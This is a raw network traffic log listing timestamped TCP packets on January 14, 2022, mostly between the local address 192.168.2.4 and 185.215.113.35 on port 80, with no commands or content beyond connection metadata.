Jan 14, 2022 00:16:08.320117950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320199013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320372105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320475101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320599079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320682049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320775986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320863008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.320960045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321049929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321160078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321242094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321378946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321474075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321569920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321664095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321758986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321852922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.321937084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322047949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322149992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322236061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322356939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322741032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322856903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.322952032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323055983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323148966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323256016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323344946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323438883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323528051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323620081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323705912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323797941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323899031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.323988914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324115038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324208975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324305058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324394941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324486971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324573040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324665070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324750900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324842930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.324927092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.325021982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.325113058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.325203896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.329440117 CET	80	49904	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.329590082 CET	49904	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.342468977 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.342794895 CET	80	49901	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.342953920 CET	49901	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.348510027 CET	49904	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.348671913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.348766088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349076033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349200964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349286079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349385977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349489927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349584103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349684000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349781036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.349880934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.360999107 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.362483978 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:08.374094963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.374290943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.374566078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.374766111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.374912977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375031948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375119925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375194073 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.375227928 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.375227928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375365973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375466108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375497103 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.375552893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375634909 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.375657082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375737906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375798941 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.375852108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.375983953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376012087 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.376069069 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.376116991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376249075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376353979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376446009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376478910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.376523972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376627922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376708031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376791954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376877069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.376957893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377041101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377126932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377207994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377302885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377384901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377475977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377554893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377640009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377722025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377804995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377890110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.377974987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378057003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378145933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378226995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378323078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378405094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378492117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378576040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378654957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378746033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378825903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378911018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.378993988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.379077911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.379163980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.379916906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380053043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380143881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380242109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380326986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380424976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380511045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380609035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380687952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380784988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380868912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.380965948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381047964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381144047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381227016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381498098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381591082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381685019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381767035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381863117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.381947994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382065058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382158041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382282019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382370949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382472038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382554054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382641077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382728100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382819891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382905960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.382997990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383109093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383405924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383514881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383606911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383694887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383790970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383868933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.383965969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384051085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384146929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384232044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384330034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384413958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384510994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384608030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384699106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384797096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384898901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.384998083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.385071039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.385168076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.385251045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.385348082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.391984940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392076015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392159939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392400026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392523050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392622948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392708063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392803907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392889023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.392986059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393069983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393163919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393253088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393347025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393428087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393527985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393608093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393701077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393788099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393881083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.393986940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394089937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394179106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394285917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394372940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394467115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394550085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394644976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394728899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394821882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.394921064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395016909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395109892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395203114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395287037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395380020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395464897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395556927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395648003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395739079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395824909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.395916939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396007061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396100044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396193027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396281958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396375895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396496058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396610022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396701097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396781921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396872044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.396953106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397042036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397123098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397207022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397298098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397386074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397469997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397552013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397638083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397725105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397803068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397891045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.397972107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398061991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398143053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398232937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398327112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398420095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398500919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398586035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398672104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398758888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.398838997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399116039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399219990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399313927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399405003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399493933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399590015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399669886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399765968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399861097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.399946928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400058031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400129080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400222063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400314093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400464058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400677919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400794983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400886059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.400969028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401071072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401164055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401262045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401355982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401448011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401536942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401632071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401726007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401818991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.401933908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.402060986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.409694910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.409825087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.409924030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410003901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410111904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410206079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410305977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410397053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410487890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410576105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410669088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410753965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410851002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.410938025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411030054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411125898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411212921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411303043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411389112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411473989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411557913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411640882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411729097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411808968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411897898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.411983967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412072897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412154913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412240028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412352085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412441969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412522078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412607908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412693024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412775040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412862062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.412946939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.413028955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.413116932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.413204908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.415186882 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:08.420963049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421092033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421190023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421298027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421385050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421479940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421565056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421658993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421741009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421838045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.421921968 CET	49902	80	192.168.2.4	185.215.113.35
